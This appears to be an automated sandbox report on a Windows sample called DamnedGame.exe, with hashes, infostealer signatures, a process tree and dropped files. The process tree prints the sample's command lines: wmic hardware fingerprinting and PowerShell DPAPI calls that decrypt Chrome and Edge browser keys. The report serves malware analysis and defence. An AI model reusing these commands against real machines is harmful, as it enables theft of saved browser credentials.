Analysis
-
max time kernel
6s -
max time network
16s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
28-04-2024 10:09
Errors
Reason
Machine shutdown
General
-
Target
DamnedGame.exe
-
Size
155.0MB
-
MD5
a15ef1d51df5d5fdfcd81789673c9528
-
SHA1
dd3df71d35fde96e9fb198637d45530a398ed651
-
SHA256
1a8f3a0410ed2199939717b28dad2b90d6342afc8bb612125f235e2061324c4f
-
SHA512
3b94f25a22d8b6144ae83e325325c13f8375eeffaff01c08080a192c1d70f8a94257106fd7a713e2ea45417247acffecb83184ec744be06a7846eaeb5fe08159
-
SSDEEP
1572864:GTmw0ciLNpDPuAvHxJLkY2O6Ea3f9kwZXeT6EivLp1vUAtdjtZn+f4FnIvGaC9dU:Bv6E70+Mk
Score
7/10
Malware Config
Signatures
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
-
Detects videocard installed 1 TTPs 6 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\DamnedGame.exe"C:\Users\Admin\AppData\Local\Temp\DamnedGame.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,224,59,76,177,10,52,78,177,63,78,210,62,50,156,225,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,221,4,103,227,79,45,36,161,179,93,255,96,108,95,223,141,253,194,16,197,104,52,141,15,138,221,8,4,239,27,97,202,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,120,73,108,237,89,202,253,219,178,95,52,182,251,180,186,253,172,205,205,205,122,196,234,154,150,243,113,146,18,5,49,48,0,0,0,20,141,95,248,194,246,143,79,210,35,122,19,160,108,48,182,78,4,28,184,126,233,13,155,43,199,203,108,51,59,125,10,224,83,241,207,33,146,194,60,160,134,249,117,193,39,190,67,64,0,0,0,11,113,84,189,28,110,142,81,114,248,103,80,52,207,32,222,107,153,19,79,42,201,132,204,19,244,40,210,151,199,230,31,31,146,107,18,134,107,83,203,229,169,115,50,159,234,102,49,126,23,49,162,182,95,128,89,198,88,177,220,115,219,145,150), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,224,59,76,177,10,52,78,177,63,78,210,62,50,156,225,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,221,4,103,227,79,45,36,161,179,93,255,96,108,95,223,141,253,194,16,197,104,52,141,15,138,221,8,4,239,27,97,202,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,120,73,108,237,89,202,253,219,178,95,52,182,251,180,186,253,172,205,205,205,122,196,234,154,150,243,113,146,18,5,49,48,0,0,0,20,141,95,248,194,246,143,79,210,35,122,19,160,108,48,182,78,4,28,184,126,233,13,155,43,199,203,108,51,59,125,10,224,83,241,207,33,146,194,60,160,134,249,117,193,39,190,67,64,0,0,0,11,113,84,189,28,110,142,81,114,248,103,80,52,207,32,222,107,153,19,79,42,201,132,204,19,244,40,210,151,199,230,31,31,146,107,18,134,107,83,203,229,169,115,50,159,234,102,49,126,23,49,162,182,95,128,89,198,88,177,220,115,219,145,150), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,224,59,76,177,10,52,78,177,63,78,210,62,50,156,225,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,88,181,211,186,126,84,134,209,23,124,38,60,65,14,114,113,91,205,115,150,43,19,228,64,126,77,107,44,52,224,242,85,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,189,232,159,71,54,61,206,76,149,158,215,29,231,177,118,152,202,136,229,162,150,92,17,213,230,140,181,209,55,186,240,232,48,0,0,0,182,75,170,89,61,34,73,103,231,137,46,30,204,102,155,160,138,59,217,65,158,187,214,49,56,123,183,111,160,115,126,83,209,142,194,95,100,248,41,194,49,219,181,178,226,183,177,195,64,0,0,0,110,112,78,255,243,115,91,144,216,125,119,250,232,128,139,108,156,215,104,152,168,73,149,122,68,241,108,70,78,1,214,171,25,131,251,26,188,165,220,27,18,226,236,93,125,32,170,118,79,187,79,120,190,240,53,208,254,115,46,173,202,247,154,133), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,224,59,76,177,10,52,78,177,63,78,210,62,50,156,225,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,88,181,211,186,126,84,134,209,23,124,38,60,65,14,114,113,91,205,115,150,43,19,228,64,126,77,107,44,52,224,242,85,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,189,232,159,71,54,61,206,76,149,158,215,29,231,177,118,152,202,136,229,162,150,92,17,213,230,140,181,209,55,186,240,232,48,0,0,0,182,75,170,89,61,34,73,103,231,137,46,30,204,102,155,160,138,59,217,65,158,187,214,49,56,123,183,111,160,115,126,83,209,142,194,95,100,248,41,194,49,219,181,178,226,183,177,195,64,0,0,0,110,112,78,255,243,115,91,144,216,125,119,250,232,128,139,108,156,215,104,152,168,73,149,122,68,241,108,70,78,1,214,171,25,131,251,26,188,165,220,27,18,226,236,93,125,32,170,118,79,187,79,120,190,240,53,208,254,115,46,173,202,247,154,133), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\DamnedGame.exe"C:\Users\Admin\AppData\Local\Temp\DamnedGame.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\DamnedGame" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 --field-trial-handle=1916,i,4948767681736356853,123007783721328344,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵
-
C:\Windows\system32\find.exefind /i "Speed"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\DamnedGame.exe"C:\Users\Admin\AppData\Local\Temp\DamnedGame.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\DamnedGame" --mojo-platform-channel-handle=1312 --field-trial-handle=1916,i,4948767681736356853,123007783721328344,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get ProcessorId"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get ProcessorId3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get Product"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get Product3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get SerialNumber"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get SerialNumber3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic OS get caption3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵
-
C:\Windows\system32\find.exefind /i "Speed"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get TotalPhysicalMemory"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get TotalPhysicalMemory3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_videocontroller get caption,PNPDeviceID"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_videocontroller get caption,PNPDeviceID3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get SerialNumber"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get SerialNumber3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵
-
C:\Windows\system32\find.exefind /i "Speed"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵
-
C:\Windows\system32\find.exefind /i "Speed"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵
-
C:\Windows\system32\find.exefind /i "Speed"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵
-
C:\Windows\system32\find.exefind /i "Speed"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58e26941f21dac5843c6d170e536afccb
SHA126b9ebd7bf3ed13bc51874ba06151850a0dac7db
SHA256316f6ce22306f3018f9f57435ea75092633097182646f7e4ca23e2e2aa1393c0
SHA5129148227032d98d49baf0d81a7435ba3adc653d7790245140acc50c38de00839d26a661b92f6754b15bab54fe81fbcf9003692fd7bef09027f11ef703a5879e62
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD53818674940de88e6ea324e6a6d111f03
SHA148435a81e6b3c922128e26917d342564c562d7b5
SHA2563c6fab0732ed8df8a5566a672a10a35c2bdcc47501f337234fbdd784b93ea813
SHA51255f52b38ce76f9642c28e2859641856d1c48fc4275b279b4dd8902da7fd6ea4f404b683bb967d15905d2b9cf42ea36f817ad110073091a83b671abb3ef21d108
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD545c765fd0f7e3a5f9014881c705e2548
SHA1ce3d1daf64fe86f891f60686f63db78e8283d7bc
SHA256a7bbfc83319d005a5efd43fcd2ac67c80a3c1c34eaca25b8a3550f9c0e496f68
SHA512df07fee67015bad7b5f70fd49cb13422ffb8279e9e5a410247eaea8599c04b663d034a62284f8f4352950d32fa6a1aa735c308c02055ab097474d40ff69e0cdb
-
C:\Users\Admin\AppData\Local\Temp\3c22c8ca-8512-4394-9453-9885839dca67.tmp.nodeFilesize
1.4MB
MD556192831a7f808874207ba593f464415
SHA1e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA2566aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_menjaxay.rzo.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/4148-5-0x00000239D2410000-0x00000239D2432000-memory.dmpFilesize
136KB
-
memory/4872-30-0x00000225D47E0000-0x00000225D4830000-memory.dmpFilesize
320KB